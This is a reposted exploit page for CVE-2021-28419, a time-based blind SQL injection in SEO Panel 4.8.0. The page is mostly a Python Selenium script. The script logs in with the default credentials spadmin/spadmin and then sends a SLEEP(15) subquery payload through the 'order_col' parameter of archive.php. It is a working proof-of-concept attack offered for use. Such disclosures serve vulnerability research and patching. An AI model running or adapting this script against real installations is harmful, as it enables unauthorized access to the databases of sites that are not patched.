SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) exploit

3 years ago 176
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=EDB-ID:49804 # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) # Author: nu11secur1ty # Testing and Debugging: nu11secur1ty # Date: 04/25/2021 # Vendor: https://www.seopanel.org/ # Link: https://www.seopanel.org/spdownload/4.8.0 # CVE: CVE-2021-28419 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-28419 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://192.168.1.3/seopanel/login.php" #enter your login username username="spadmin" #enter your login password password="spadmin" #enter the element for username input field element_for_username="userName" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="login" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit browser.get((" http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT 7397 FROM (SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1")) print("payload is deployed MySQL is not responding correctly...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")
Read Entire Article